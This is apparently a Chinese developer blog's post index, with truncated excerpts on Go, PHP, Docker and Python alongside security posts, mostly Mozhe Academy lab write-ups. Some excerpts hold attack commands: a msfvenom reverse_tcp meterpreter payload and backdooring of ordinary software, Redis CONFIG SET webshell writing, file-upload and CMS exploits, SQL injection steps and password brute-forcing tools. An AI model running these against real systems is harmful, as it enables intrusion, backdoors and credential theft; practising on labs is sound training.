- 博客(34)
- 收藏
- 关注
RSS订阅原创 kail 生成window木马,软件加后门
1、kail 下命令行运行msfvenom -p windows/meterpreter/reverse_tcp lhost=10.4.7.131 lport=4444 -f exe >shell.exe或者 正常软件加后门(不影响正常软件的使用)msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.4.7.131 LPORT=4444 -b '\x00' -e x86/shik
2021-01-22 17:20:10
899
原创 golang 查询目录下所有文件和大小
package main/** 计算目录下所有文件(包括目录)的大小 */import ( "fmt" "io/ioutil" "log" "os" "path/filepath" "sync" "time")var waitGroup sync.WaitGroupvar ch = make(chan struct{}, 255)func dirents(path string) ([]os.FileInfo, bool) { entries, err :=.
2020-12-28 13:55:07
1131
原创 centos 7 Docker使用Portainer搭建可视化界面
1、下载镜像docker pull docker.io/portainer/portainer2、单机版运行启动docker run -d -p 9000:9000 --restart=always -v /var/run/docker.sock:/var/run/docker.sock --name prtainer-test docker.io/portainer/portainer-d:后台运行容器-、p 9000:9000 映射 9000主机端口--res...
2020-05-21 11:44:19
1070
原创 页面头部 出现  空格问题,PHP 处理方法
出现 空格问题,导致页面样式变了根本问题是编码格式包含了BOM用sublime 打开文件,右下角有格式只需要保存格式为 UTF-8 即可如文件过多,找不出带BOM的,可以执行下面PHP代码找出header('content-Type: text/html; charset=utf-8'); if(isset($_GET['d...
2019-10-28 11:08:54
382
原创 golang 爆破破解 rar5 压缩文件密码
rar5 网上大多数爆破软件不支持,只支持rar5以下的所以自己写了一个爆破程序,考虑性能,用Golang 去写 ,用到Golang 里面的GO程Go 没有支持 rar5 解压 的包,故调用 cmd 命令去执行1、先下载 WinRAR 压缩软件 ,给 cmd 命令调动2、把 WinRAR加入环境变量(方便 cmd 命令使用 unrar )3、测试一下 是否可以调用cmd...
2019-09-06 14:41:08
6026
1
原创 python 密码生成器
python 密码生成器根据密码的长度有顺序的写入文本文件作用于爆破 之类的import itertools as its# 密码生成器# :param min_digits: 密码最小长度# :param max_digits: 密码最大长度# :param words: 密码可能涉及的字符# :return: 密码def get_password(min_d...
2019-09-06 10:15:37
2234
原创 在线web魔方和在线AI象棋
在线web魔方:http://www.wuxiaodong.cn/mf在线AI象棋:http://www.wuxiaodong.cn/xq
2019-08-01 16:15:57
1650
原创 墨者学院-编辑器漏洞分析溯源(第2题)
首先 win10 下可以打开的,用IE 8打开的,其他人说打不开的,可以IE 按F12换版本找到后台 IP/admin_login.asp帐号admin 密码 8583213p点击样式管理下的新增样式图片类型 cer (IIS6.0平台解析为asp执行),名称随便填,用绝对路径保存后返回,点击工具后,新增,按钮设置加插入或修改图片,保存返回,点击预览,上面操作全在win10 谷歌浏...
2019-01-12 10:00:28
720
2
原创 墨者学院 - Redis配置错误导致的远程代码漏洞溯源
给了2个端口,其中一个是redis 的 (后面那个)虚拟机上安装 redis-cli (可以用宝塔直接安装 redis)redis-cli -h 219.153.49.228 -p 49375设置路径和文件名CONFIG SET dir /var/www/html CONFIG SET dbfilename shell.php写入文件SET shell "<?...
2019-01-04 09:20:27
813
原创 墨者学院-CMS系统漏洞分析溯源(第6题)
按提示先找后台,用御剑找后台后台地址 ip/servlets/在首页找到 mozhe777 用户,利用emlog博客的漏洞,错误不刷新验证码爆破密码用burp 爆破爆破出密码为 qwer1234登录成功后,点击数据库栏目再点击备份数据库编辑备份下来的数据库,在末尾添加sql(新建emlog_shell数据表,向该表中添加小马,写入文件,再删除)dr...
2018-12-26 12:29:53
564
原创 墨者学院-在线靶场 - CMS系统漏洞分析溯源(第7题)
墨者 在线靶场 CMS系统漏洞分析溯源(第7题)DEDECMS 任意用户密码重置漏洞利用 开始用 admin 发现前台出错,后台也登录不了,改用 test 帐号利用burp 抓包改 Posthttp://219.153.49.228:47764/member/resetpassword.phpPOST /member/resetpassword.php HTTP/1.1dopo...
2018-12-25 11:24:38
1415
原创 墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)
手工注入 墨者学院 SQL过滤字符后手工注入漏洞测试(第3题)使用sqlmap 跑,跑不出表名,所以手工注入点击进去靶场域名url为: http://219.153.49.228:41774/new_list.php?id=1 第一步:判断是否有注入点 http://219.153.49.228:41774/new_list.php?id=1' 出...
2018-12-21 10:34:35
1429
2
原创 墨者学院 靶场练习(一) SQL注入
墨者学院 在线靶场工具: sqlmap第一题: SQL手工注入漏洞测试(MySQL数据库-字符型)利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_42357070/article/details/81215715 进来点击公告 sqlmap 用于 mysql注入的步骤:1:查找数据库./sqlmap.py ...
2018-12-20 14:51:14
7918
原创 pyqt5的安装过程和使用
PyQt是一个创建GUI应用程序的工具包。它是Python编程语言和Qt库的成功融合。用于个人写些小工具,简单使用。下面记录pyqt5 的安装过程 和在python3 下的使用1、先安装SIP 和 PyQt5pip3 install SIPpip install PyQt52、运行代码测试import sysfrom PyQt5 import QtWidgets, ...
2018-11-27 15:19:33
9192
3
原创 centos服务器搭建代理IP 给 Python爬虫使用
centos7服务器 用Squid搭建HTTP代理,给python 爬 网站用python 爬一个网站次数太多,被封IP,就用代理IP解决可去西刺免费代理IP网站找免费代理IP(http://www.xicidaili.com/)找了一会免费IP,发现不是不能用就是太慢,决定自己用服务器搭建一个代理IP先上python 代码from urllib import re...
2018-09-06 16:55:04
4741
3
原创 python3 出现 IncompleteRead错误
python3 用urllib时,出现http.client.IncompleteRead: IncompleteRead(34144 bytes read) 错误代码:原出错代码:html = urllib.request.urlopen(request).read().decode('utf-8') 解决方法:try: html = urllib.request.ur...
2018-08-24 10:51:56
6278
原创 《Python绝技:运用Python成为顶级黑客》python3实践记录
第一章——入门扫描IP端口 (18、19 页)import socketimport osimport sysdef retBanner(ip,port): try: socket.setdefaulttimeout(2) #设置超时 s = socket.socket() s.connect((ip,p...
2018-07-28 17:00:34
8630
1
转载 rem 单位自适应
用rem 用做移动端单位,自动识别分辨率调节font-size 大小即 用rem 做单位就可以响应式了(function (doc, win) { var docEl = doc.documentElement, resizeEvt = 'orientationchange' in window ? 'orientationchange' : 'resize', recalc ...
2018-06-08 15:56:32
413
原创 python3 远程登录带验证码
第一步:把页面验证码保存起来,以便于用pytesseract识别验证码(PHP文件后缀可直接保持session的情况下访问php文件返回的html就是当前需要提交的图片)s = requests.session()urlCode = "http:/XXXXXXXXX/include/vdimgck.php"resp = s.get(urlCode)f = open("./img.jpg","...
2018-05-25 16:27:12
1241
原创 记一次 python3 验证码识别 出错过程
需要安装 pillow、pytesseract、tesseract-ocr前面2个可以直接pip安装,tesseract-ocr需要去下载安装包(直接网上搜,很多)安装完运行下py代码import pytesseractfrom PIL import Imageimg=Image.open('./ver.jpg')print (pytesseract.image_to_string(img,...
2018-05-25 09:44:14
2747
2
原创 python3 图片转化为字符,并做成可视化操作工具
python3 图片转化为字符,并转化成可视化操作工具。然后生成EXE文件,发给妹子,又装逼成功~先上效果图运行 python 文件,然后上传一张小图:生成txt 的文件:源码:from tkinter import *from tkinter import filedialogfrom tkinter.filedialog import askdirectoryfrom PIL impor...
2018-05-14 17:08:34
1753
原创 python3 爬虫抓取豆掰电影TOP 250
个人喜欢看电影,就去爬豆瓣上的电影Top榜,python入门不久,顺便学习练下from urllib import request from bs4 import BeautifulSoup #Beautiful Soup是一个可以从HTML或XML文件中提取结构化数据的Python库 txt =''top = 0# 遍历豆瓣网站,爬虫分页数据for i ...
2018-05-05 16:35:00
1008
原创 PHP开发APP接口 记录
用于 把数据返给APP接口使用 ,返回 方式有 xml,json,arrayclass Response { /** * 综合方式输出数据 * @param integer $code 状态码 * @param string $message 提示信息 * @param array $data 数据 * @param string $type 数据类型 * return st
2017-12-14 16:36:55
779
原创 PHP制作个人名片二维码
本文用PHP来制作个人名片二维码,可以让别人扫二维码展示出自己的信息,并且可以添加到手机联系人生成为 qrcode二维码,所以用到 qrcode的库,可以在网上下载<?php include_once('phpqrcode/qrlib.php'); $content = 'BEGIN:VCARD'."\n"; $content .='version:2.1'."\n"; $co
2017-12-07 16:18:15
1789
转载 PHP数据导出Excel
需要将php数据导出Exel表格中,可以用PHPExcel,但是也有更快的方法,但是会出现些小问题比如:/* *处理Excel导出 *@param $datas array 设置表格数据 *@param $titlename string 设置head *@param $title string 设置表头 */ /*** */function excelData
2017-11-17 11:24:30
788
转载 转:PHP中防止SQL注入的方法
【一、在服务器端配置】 安全,PHP代码编写是一方面,PHP的配置更是非常关键。我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php.ini中的内容,让我们执行 php能够更安全。整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击,一下我们慢慢探讨。
2017-11-07 15:59:50
1185
原创 PHP多维数组排序
在PHP中,对各种数组排序,归功于数组函数 sort()、ksort()、rsort()、asort()...等,使用他们进行各种排序,但是用于多维数组就没那么方便简单。这篇文章介绍 usort() 和 array_multisort() 处理多维数组排序。
2017-09-16 09:28:41
1373
原创 PHP 经典有趣的算法收集(面试题)
本文为收集记录PHP经典有趣的算法,并加注释和分析,自己已全试过。1、一群猴子排成一圈,按1,2,…,n依次编号。然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数,再数到第m只,在把它踢出去…,如此不停的进行下去,直到最后只剩下一只猴子为止,那只猴子就叫做大王。要求编程模拟此过程,输入m、n, 输出最后那个大王的编号。 function king($n, $m){ ...
2017-09-13 09:04:54
5762
原创 PHP 操作 redis 手册
本文为网上查询资料,修改作为笔记记载,为什么用 redis 不用 memcached?memcached存放数据无法持久化(将数据写到硬盘中)。redis数据也是存放到内存中,所以速度快。并且数据可以周期性写到硬盘中,Redis数据可以持久化。Redis有五种数据类型字符串(string)、list(链表)、set(集合)、zset(有序集合)、hash
2017-08-25 11:25:53
752
原创 用 chart.js 创建漂亮图表 (HTML绘制工具库)
chart.js :开源免费图表组件,HTML绘制工具库。简单介绍chart组件的全部图形。
2017-08-22 12:14:31
5905
原创 PHP-ML (php机器学习库)详细学习 ( 二 )
PHP-ml 是 php 的机器学习库。同时包含算法,交叉验证,神经网络,预处理,特征提取等。继续学习PHP-ml 机器学习,上篇只是学习了 首页推荐的例子KNearestNeighbors分类器,这篇学习别的。手册地址:http://php-ml.readthedocs.io/en/latest/Apriori Associator :基于Apriori算法的频繁
2017-08-21 14:15:58
7711
原创 PHP-ML (php机器学习库)详细学习 (一)
PHP-ml的学习,PHP-ml 是 PHP 的机器学习库。同时包含算法,交叉验证,神经网络,预处理,特征提取等。github : https://github.com/php-ai/php-ml
2017-08-19 15:01:56
9628
1
原创 人工智能机器回话 api + html
之前发现一个有趣的API接口(图灵机器人),就简单写了一个html页面,无聊和机器人聊聊天,发给死肥宅们解闷开始加入一个 <li >找我干啥呢?亲</li>机器人自动回话当然,也做了自适应,适合移动端使用再把对话记录写入 note.txt 里面$myfile = fopen("note.txt", "a+") or die("Unable to open file!");...
2017-08-17 12:13:14
7906
23
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人